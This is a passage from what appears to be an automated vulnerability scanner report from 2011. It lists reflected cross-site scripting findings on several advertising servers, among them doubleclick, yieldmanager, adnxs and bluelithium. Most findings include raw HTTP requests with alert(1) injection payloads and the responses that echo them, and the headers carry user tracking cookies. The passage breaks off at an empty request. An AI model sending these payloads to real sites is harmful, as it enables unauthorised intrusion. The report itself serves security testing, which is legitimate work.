This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/test.gmaps/business;dc_ref=cdd04'%3balert(1)//df8038a084e HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://maps.google.com/mapfiles/ads/pp_dfp_ads_20100528.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 321 Cache-Control: no-cache Pragma: no-cache Date: Tue, 08 Mar 2011 01:23:42 GMT Expires: Tue, 08 Mar 2011 01:23:42 GMT
1.29. http://ad.doubleclick.net/adj/test.gmaps/business [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.doubleclick.net
Path:
/adj/test.gmaps/business
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 25dd4'-alert(1)-'524a5a4183f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/test.gmaps/business?25dd4'-alert(1)-'524a5a4183f=1 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 316 Cache-Control: no-cache Pragma: no-cache Date: Tue, 08 Mar 2011 11:59:52 GMT Expires: Tue, 08 Mar 2011 11:59:52 GMT Connection: close
1.30. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.yieldmanager.com
Path:
/st
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6bcfe"-alert(1)-"519b47b4f9c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /st?ad_type=iframe&ad_size=160x600§ion=1597598&6bcfe"-alert(1)-"519b47b4f9c=1 HTTP/1.1 Host: ad.yieldmanager.com Proxy-Connection: keep-alive Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x30bfc3.js&size_id=9&account_id=7469&site_id=12005&size=160x600 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: uid=uid=23d97e10-394a-11e0-a408-001b24935f22&_hmacv=1&_salt=3386971552&_keyid=k1&_hmac=386c7ba4901acee5aa0724e9ce3af05518ef0c8b; pv1="b!!!!.!!L7_!*:n8!$0c3!,+ZH!#WUL!!!!$!?5%!(KYu6!wDW,!%JFh!%Oo9!$8eI~~~~~<o,,><s?nHM.jTN!#819~!$gwk!0E=#!%G'u!!!!$!?5%!$Tey-!ZZ<)!!jYm!'Mrt~~~~~~<p%L'~M.jTN!#tBx!+*gd!$6O/!0H/O!%G[Z!!H<'!!?5%'2^c6!wVd.!%QRf!!ayK!'N^l~~~~~<pN(@~~!#R%`!!!v!!$P2D!0con!$q^.!!H<'!#W(2)HM3:!ZmB)!'%%+!%g*K~~~~~~<pv08<qtnR!!!([!!qy:!!!%O!#26@!0QKk!$6[3~!#My1)eIbA!?vQ,!$%GC~~~~~~~<pk#S<qibm!!!([!#LXe!+*gd!$6O/!,?Kj!$M=4!#:m1!?5%!'2^c5!wVd.!%QRf!%?,K!%?+N~~~~~<pN)1~~!#LXr!+*gd!$6O/!,?Kj!$M=4!#:m1!?5%!'2^c5!wVd.!%QRf!%?,K!%?+N~~~~~<pN)1~M.jTN!#LY.!+*gd!$6O/!,?Kj!$M=4!#:m1!?5%!'2^c5!wVd.!%QRf!%?,K!%?+N~~~~~<pN)1~M.jTN!#Lb-!+*gd!$6O/!,?Kj!$M=4!#:m1!?5%!'2^c5!wVd.!%QRf!%?,K!%?+N~~~~~<pN)1~!!xa=!#P,C!-8F-!$V-H!0.2@!$u#J!!!!$!?5%!%QX7/!@Dj0!'%it~~~~~~~<pqfN<qpLh!!!([!!LV3!-8F-!$V-H!,Dln!$tyI!!H<)!?5%!%QX7/!@Dj0!'%it~~~~~~~<pqk'<qpQA!!!(["; ih="b!!!!?!%?RR!!!!#<pqk,!%?m7!!!!#<p]i+!'cGC!!!!#<nQH-!'cKt!!!!$<nQH1!(4uP!!!!#<p^*H!)AU7!!!!#<pN(R!*rnf!!!!#<pv/a!,+ZH!!!!#<o,,>!,?Kj!!!!$<pN)1!,@lO!!!!#<nQHP!,@rl!!!!%<nQHf!,@s)!!!!#<nQHQ!,A*-!!!!$<pj[S!,Dln!!!!#<pqk'!->hZ!!!!#<pv0=!-fc'!!!!#<pd]p!.`.U!!!!#<o'YF!0(6l!!!!#<p]b^!0.2@!!!!#<pqfN!0E=#!!!!#<p%L'!0H/O!!!!$<pN(@!0QKi!!!!#<p]Te!0QKk!!!!$<pk#S!0QLr!!!!#<pN(S!0cn,!!!!#<p]aI!0con!!!!%<pv08!0coo!!!!#<p]rg"; cafb=/)2(Js!!94KE2!IIkB/eII<Uu; bh="b!!!%*!!!?I!!!!,<q)L@!!%#4!!7(q<o_%.!!)Qf!!!!(<nTlX!!*cu!!!!/<q)L@!!*oY!!!!%<pN)4!!+Vp!!!!#<pqhD!!-?2!!!!*<pN)4!!-L3!!!!#<pqhD!!-LP!!!!#<pqhD!!-Oo!!!!#<nsgt!!/DA!!!!/<q)L@!!/Hd!!!!.<q)L@!!/He!!!!.<q)L@!!/j$!!!!%<nTlW!!/pv!!!!#<pqhD!!0O0!!!!#<pqhD!!1CD!!!!#<p]be!!1Mv!!!!'<nZs,!!1N=!!!!$<nZs,!!1SP!!!!#<nsm5!!2-O!!!!(<nTlW!!2P@!!!!#<nAv8!!3):!!!!1<q)L@!!3)?!!!!1<q)L@!!3)C!!!!1<q)L@!!4@a!!!!#<q)L?!!4oZ!!!!#<nA,w!!?VS!!7(q<o_%.!!M=.!!!!)<pjWE!!Mev!!!!#<oa?r!!MfS!!!!'<oaA%!!N8v!!!!#<pqhD!!PKh!!!!#<okyj!!PL)!!!!%<okyj!!PL`!!!!'<okyj!!R`u!!!!#<q)L@!!Ra#!!!!#<q)L@!!Ra)!!!!#<q)L@!!UHs!!!!(<pLo`!!Vj^!!!!%<pLoI!!X*c!!!!#<pBKB!!X41!!!!%<pLo[!!Zwb!!!!/<pN)4!!bu:!!!!)<pjWE!!g]F!!!!#<pqhD!!itb!!!!2<q)L@!!j,.!!<NC<nYX3!!jW8!!!!)<pjWE!!nAU!!!!#<pqhD!!pkJ!!!!2<q)L@!!pkL!!!!2<q)L@!!qrq!!!!2<q)L@!!qrr!!!!2<q)L@!!qrv!!!!2<q)L@!!qyo!!!!.<q)L@!!st`!!!!(<nA,e!!u2f!!!!#<nA,G!!uhi!!!!#<pqhD!!waQ!!!!#<pqhD!!xw:!!!!#<pqhD!!yXN!!!!#<nAwa!!yaE!!!!)<pjWE!!yq?!!!!#<pOO/!##ah!!!!#<pqhD!#(mB!!!!#<pryM!#(x0!!!!(<pLo[!#+x/!!!!#<nQdW!#.dO!!!!)<pjWE!#0mN!!!!#<nAwa!#16I!!<NC<nYX3!#17A!!7(q<o_%.!#2.i!!!!#<okyj!#2Ic!!!!(<oaA$!#2Id!!!!%<oaA!!#3[#!!!!$<nQHk!#3pS!!!!#<p,e4!#3pv!!!!#<p,e4!#3pw!!!!#<pryM!#4ue!!!!#<p3Y1!#5(U!!!!#<pjT1!#5(W!!!!#<piFJ!#5(Y!!!!#<pjTA!#5(^!!!!#<pjT1!#5(a!!!!#<piFJ!#5(c!!!!#<piFJ!#5f*!!!!#<p2A7!#6Ty!!!!#<oDg4!#89b!!!!#<pqh_!#C-Y!!!!#<q*sU!#I=D!!!!$<pd+P!#K?^!!!!'<p_19!#L*a!!!!2<q)L@!#LI/!!!!#<p]be!#MTC!!!!2<q)L@!#MTF!!!!)<pv/h!#MTH!!!!2<q)L@!#MTI!!!!2<q)L@!#MTJ!!!!2<q)L@!#M]c!!!!)<pjWE!#O60!!!!#<nAwa!#O@M!!<NC<nYX3!#OWV!!!!$<ol!U!#OWX!!!!#<ol!J!#O^a!!!!#<nAv8!#P8A!!!!#<nAv8!#Q*T!!!!)<pjWE!#Q+/!!!!)<pjWE!#Q+^!!!!)<pjWE!#Q+p!!!!)<pjWE!#Q,.!!!!#<pjWF!#Qh8!!!!#<pryM!#QhF!!!!#<q*sU!#QpI!!!!/<q)L@!#QpJ!!!!/<q)L@!#QpL!!!!/<q)L@!#QpS!!!!/<q)L@!#QpU!!!!/<q)L@!#RU?!!!!2<q)L@!#RUA!!!!2<q)L@!#RY.!!!!)<pjWE!#Ri/!!!!)<pjWE!#Rij!!!!)<pjWE!#SCj!!!!%<pjWC!#SEW!!!!#<p2A7!#Sq>!!!!#<nrb9!#T-b!!!!2<q)L@!#TnE!!!!2<q)L@!#Twl!!!!#<nZs,!#Tws!!!!#<nZjk!#U@t!!!!-<q)L@!#U@x!!!!-<q)L@!#UA$!!!!-<q)L@!#UDQ!!!!)<pv/h!#UW*!!!!#<pryM!#V,1!!!!#<pqhD!#VRb!!!!#<nAv7!#XA!!!!!)<pjWE!#XI9!!!!#<q)LA!#YQK!!!!#<oDg)!#YQL!!!!#<pjT*!#[Qv!!!!#<pqhD!#]#G!!!!#<pqev!#](K!!!!#<o,+N!#]Ub!!!!0<q)L@!#]Uc!!!!0<q)L@!#]Ud!!!!0<q)L@!#]Ue!!!!0<q)L@!#]Uf!!!!0<q)L@!#]Ug!!!!0<q)L@!#]Uh!!!!0<q)L@!#]Ui!!!!0<q)L@!#]Uj!!!!0<q)L@!#]Uk!!!!0<q)L@!#]Ul!!!!0<q)L@!#]Um!!!!0<q)L@!#]Un!!!!0<q)L@!#]Uo!!!!0<q)L@!#]Up!!!!0<q)L@!#]Us!!!!0<q)L@!#]Uy!!!!0<q)L@!#]W%!!!!)<pjWE!#]Z!!!!!.<pN)4!#]Z$!!!!*<pN)4!#]w8!!!!%<pv/h!#]w<!!!!%<pv/h!#]wX!!!!%<pv/h!#]w[!!!!%<pv/h!#]wf!!!!%<pv/h!#]wp!!!!%<pv/h!#^Bo!!!!)<pjWE!#^c@!!!!)<pv/h!#^cm!!!!)<pv/h!#^f#!!!!.<q)L@!#a3k!!!!)<pjWE!#a=#!!!!#<o`%d!#aG>!!!!)<pjWE!#aK:!!!!#<p%Ky!#b<Z!!!!#<piFJ!#b<_!!!!#<pjTD!#b<`!!!!#<pjT1!#b<a!!!!#<pjT1!#b<j!!!!#<pjT1!#b<k!!!!#<piFJ!#b<m!!!!#<nrVk!#b='!!!!#<pjT1!#b=(!!!!#<piFJ!#b=*!!!!#<piFJ!#b=E!!!!#<piFJ!#b=F!!!!#<pjT1!#b=J!!!!#<nrVk!#be'!!!!#<nAv>!#cAT!!!!#<q*to!#dX>!!!!#<o`%d!#eU%!!!!)<pjWE!#e_K!!!!$<pqfP!#f8c!!!!)<pjWE!#f__!!!!#<pd^@!#g)H!!!!)<pv/h!#g)I!!!!)<pv/h!#g)L!!!!$<p%L'!#g)M!!!!#<o,,D!#g)N!!!!$<pN'h!#g)O!!!!)<pv/h!#g)P!!!!)<pv/h!#g)Q!!!!)<pv/h!#g)R!!!!)<pv/h!#g)S!!!!)<pv/h!#g)T!!!!)<pv/h!#g)U!!!!)<pv/h!#g)V!!!!)<pv/h!#g)W!!!!)<pv/h!#g)X!!!!)<pv/h!#g)Y!!!!)<pv/h!#g)Z!!!!)<pv/h!#g)[!!!!)<pv/h!#g)]!!!!)<pv/h!#g)^!!!!)<pv/h!#gHm!!!!)<pjWE!#g[h!!!!)<pjWE!#g_f!!!!#<o,,D!#gaO!!!!$<p%L'!#gaP!!!!)<pv/h!#gb5!!!!0<q)L@!#h.N!!!!#<oDg4!#j9h!!!!#<n9!g!#l#]!!!!#<pd+P!#l*=!!!!)<pjWE!#nEj!!!!0<q)L@!#p#H!!!!)<pjWE!#p]R!!!!#<p2A7!#p]T!!!!#<p2A7!#q+A!!!!0<q)L@!#qF%!!!!)<pv/h!#qF'!!!!)<pv/h!#qUW!!!!0<q)L@!#r:6!!!!#<p]dk!#r=i!!!!#<nZs2!#rVT!!!!0<q)L@!#sXy!!!!$<pv+`!#so_!!!!#<p]be!#t:@!!!!$<nZs,!#tM)!!!!(<pv/h!#thg!!!!#<pjT1!#uJH!!!!#<pd^1!#uJJ!!!!#<pd^1!#uJR!!!!%<pv/h!#usu!!!!)<pjWE!#v9_!!!!#<nB!e!#w!@!!!!0<q)L@!#w!A!!!!0<q)L@!#w!B!!!!0<q)L@!#w!C!!!!0<q)L@!#w!D!!!!0<q)L@!#w!F!!!!0<q)L@!#w!G!!!!0<q)L@!#w!I!!!!0<q)L@!#wW9!!!!)<pjWE!#wkr!!!!#<p2A7!#wnK!!!!)<pjWE!#wnM!!!!)<pjWE!#xI*!!!!)<pjWE!#xUM!!!!*<q)L@"; BX=6l13v316lnh2l&b=4&s=8i&t=47
Response
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 00:58:21 GMT Server: YTS/1.18.4 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Cache-Control: no-store Last-Modified: Tue, 08 Mar 2011 00:58:21 GMT Pragma: no-cache Content-Length: 4648 Age: 0 Proxy-Connection: close
<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "iframe"; rm_url = "http://ad.yieldmanager.com/imp?6bcfe"-alert(1)-"519b47b4f9c=1&Z=160x600&s=1597598&_salt=2079337496";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new A ...[SNIP]...
1.31. http://ad3.liverail.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://ad3.liverail.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b52ff<a>25841ea6f9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /?b52ff<a>25841ea6f9=1 HTTP/1.1 Host: ad3.liverail.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lr_uid=98718040;
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, max-age=0 Pragma: no-cache Expires: Tue, 29 May 1984 15:00:00 GMT Content-type: text/xml; charset=UTF-8 Connection: close Date: Tue, 08 Mar 2011 12:00:03 GMT Server: lighttpd/1.4.26-devel-3M Content-Length: 184
<?xml version="1.0" encoding="utf-8"?> <liverail content='error' version='3.0-10.194.157.219'><message>Publisher ID missing (/1//10.194.157.219/b52ff<a>25841ea6f9)</message></liverail>
The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 73547'%3balert(1)//76e8989e0ad was submitted in the admeld_adprovider_id parameter. This input was echoed as 73547';alert(1)//76e8989e0ad in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 556cc'%3balert(1)//67076682b5c was submitted in the admeld_callback parameter. This input was echoed as 556cc';alert(1)//67076682b5c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 213a1'-alert(1)-'e329b3b055a was submitted in the admeld_adprovider_id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /usersync?calltype=admeld&admeld_user_id=63e2c778-f3e1-4d02-8ee2-261dfa64843d&admeld_adprovider_id=193213a1'-alert(1)-'e329b3b055a&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1 Host: admeld.adnxs.com Proxy-Connection: keep-alive Referer: http://www.merriam-webster.com/creative.php?pageid=General&placement=MW_GEN_728_TOP&groupid=5267702644&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode= Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: icu=ChIItpsBEAoYASABKAEwhNzQ6wQQhNzQ6wQYAA..; sess=1; uuid2=4470455573253905340; anj=Kfw)*g>E9G)^w'db[wa]4dhBuV`GAFslJwp]L<J.9LI^n+5g7eUr#?b<4C)$Z5Z=xTluBk:eiK-Q'.whnauT$86Pd7Ck4BQhCI[ivg=pJ+YAOK+Y9V/4<ih)v)O?esGF)Rg50mIV#zZ6!5!RzB<G5c@xPK3]W[.B#8TJpd<HJWBwur<!u!$aJVL+3d)_yOPvwDAeDo>U.2<rWlT[a#!1DAkeE/C)/N*Yt.Qe8Ycq!MV7/xC`6hqLSM-.Jn69]E!69Q%rQHJ'lwCd8Et+.r$t@:dM^Sk]scstnXG2n3]SvMTQb!sN6MYd-+='ihI^k_Q=UwG:q)zNxacpTj/*V#lI`u.ocu#skfo4RJFZC_+]J<w6>^@'C9=W'w(ndZjdS#f%mcJxPrsGj(Gs*ZmED#C>DVkH5<v3a>/k3?_SP7fRHejoSEJS=nE4hF*5?u?s5v/3/gVBpVvbXw>95_BNXC]efSp1X#=V1nH24u0(_Yyqob%utI:C9>SkJCT4%b(.*oDLNk^<!z$Q/TeJt][Xe'%GrWh_2:Iq*3Rp=B8hxV/MtMn'9JN4IT>8e
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Tue, 08-Mar-2011 01:58:40 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4470455573253905340; path=/; expires=Sun, 05-Jun-2011 01:58:40 GMT; domain=.adnxs.com; HttpOnly Content-Type: application/x-javascript Date: Mon, 07 Mar 2011 01:58:40 GMT Content-Length: 183
The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f9729'-alert(1)-'28e4793a760 was submitted in the admeld_callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /usersync?calltype=admeld&admeld_user_id=63e2c778-f3e1-4d02-8ee2-261dfa64843d&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/matchf9729'-alert(1)-'28e4793a760 HTTP/1.1 Host: admeld.adnxs.com Proxy-Connection: keep-alive Referer: http://www.merriam-webster.com/creative.php?pageid=General&placement=MW_GEN_728_TOP&groupid=5267702644&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode= Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: icu=ChIItpsBEAoYASABKAEwhNzQ6wQQhNzQ6wQYAA..; sess=1; uuid2=4470455573253905340; anj=Kfw)*g>E9G)^w'db[wa]4dhBuV`GAFslJwp]L<J.9LI^n+5g7eUr#?b<4C)$Z5Z=xTluBk:eiK-Q'.whnauT$86Pd7Ck4BQhCI[ivg=pJ+YAOK+Y9V/4<ih)v)O?esGF)Rg50mIV#zZ6!5!RzB<G5c@xPK3]W[.B#8TJpd<HJWBwur<!u!$aJVL+3d)_yOPvwDAeDo>U.2<rWlT[a#!1DAkeE/C)/N*Yt.Qe8Ycq!MV7/xC`6hqLSM-.Jn69]E!69Q%rQHJ'lwCd8Et+.r$t@:dM^Sk]scstnXG2n3]SvMTQb!sN6MYd-+='ihI^k_Q=UwG:q)zNxacpTj/*V#lI`u.ocu#skfo4RJFZC_+]J<w6>^@'C9=W'w(ndZjdS#f%mcJxPrsGj(Gs*ZmED#C>DVkH5<v3a>/k3?_SP7fRHejoSEJS=nE4hF*5?u?s5v/3/gVBpVvbXw>95_BNXC]efSp1X#=V1nH24u0(_Yyqob%utI:C9>SkJCT4%b(.*oDLNk^<!z$Q/TeJt][Xe'%GrWh_2:Iq*3Rp=B8hxV/MtMn'9JN4IT>8e
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Tue, 08-Mar-2011 02:02:38 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4470455573253905340; path=/; expires=Sun, 05-Jun-2011 02:02:38 GMT; domain=.adnxs.com; HttpOnly Content-Type: application/x-javascript Date: Mon, 07 Mar 2011 02:02:38 GMT Content-Length: 183
The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 70f21'%3balert(1)//e154bfaf813 was submitted in the admeld_adprovider_id parameter. This input was echoed as 70f21';alert(1)//e154bfaf813 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /clicksense/admeld/match?admeld_user_id=63e2c778-f3e1-4d02-8ee2-261dfa64843d&admeld_adprovider_id=7370f21'%3balert(1)//e154bfaf813&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1 Host: admeld.lucidmedia.com Proxy-Connection: keep-alive Referer: http://www.merriam-webster.com/creative.php?pageid=General&placement=MW_GEN_300_TOP&groupid=5267702644&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode= Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: 2=2tm6jj5l0la
Response
HTTP/1.1 200 OK Cache-control: no-cache, no-store Content-Type: text/plain Date: Mon, 07 Mar 2011 01:49:40 GMT P3P: CP=NOI ADM DEV CUR Pragma: no-cache Server: Apache-Coyote/1.1 Set-Cookie: 2=2tm6jj5l0la; Domain=.lucidmedia.com; Expires=Tue, 06-Mar-2012 01:49:40 GMT; Path=/ Content-Length: 192 Connection: keep-alive
The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ac52f'%3balert(1)//d88f1d56111 was submitted in the admeld_callback parameter. This input was echoed as ac52f';alert(1)//d88f1d56111 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /clicksense/admeld/match?admeld_user_id=63e2c778-f3e1-4d02-8ee2-261dfa64843d&admeld_adprovider_id=73&admeld_call_type=js&admeld_callback=http://tag.admeld.com/matchac52f'%3balert(1)//d88f1d56111 HTTP/1.1 Host: admeld.lucidmedia.com Proxy-Connection: keep-alive Referer: http://www.merriam-webster.com/creative.php?pageid=General&placement=MW_GEN_300_TOP&groupid=5267702644&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode= Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: 2=2tm6jj5l0la
Response
HTTP/1.1 200 OK Cache-control: no-cache, no-store Content-Type: text/plain Date: Mon, 07 Mar 2011 01:50:48 GMT P3P: CP=NOI ADM DEV CUR Pragma: no-cache Server: Apache-Coyote/1.1 Set-Cookie: 2=2tm6jj5l0la; Domain=.lucidmedia.com; Expires=Tue, 06-Mar-2012 01:50:49 GMT; Path=/ Content-Length: 192 Connection: keep-alive
1.38. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ads.bluelithium.com
Path:
/st
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9c277"-alert(1)-"0cd1e690ae8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /st?ad_type=iframe&ad_size=728x90§ion=1547458&9c277"-alert(1)-"0cd1e690ae8=1 HTTP/1.1 Host: ads.bluelithium.com Proxy-Connection: keep-alive Referer: http://www.merriam-webster.com/creative.php?pageid=General&placement=MW_GEN_728_BOT&groupid=1123043650&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode= Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Mon, 07 Mar 2011 01:36:21 GMT Server: YTS/1.18.4 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Cache-Control: no-store Last-Modified: Mon, 07 Mar 2011 01:36:21 GMT Pragma: no-cache Content-Length: 4645 Age: 0 Proxy-Connection: close
<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "iframe"; rm_url = "http://ads.bluelithium.com/imp?9c277"-alert(1)-"0cd1e690ae8=1&Z=728x90&s=1547458&_salt=1004587447";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Ar ...[SNIP]...
The value of the r request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 72088"%3balert(1)//e3ee0a1bc3b was submitted in the r parameter. This input was echoed as 72088";alert(1)//e3ee0a1bc3b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the redir request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3c93"-alert(1)-"142eba33132 was submitted in the redir parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the time request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c9305"%3balert(1)//021a273d1f6 was submitted in the time parameter. This input was echoed as c9305";alert(1)//021a273d1f6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cca77"><a>c294b5ef411 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
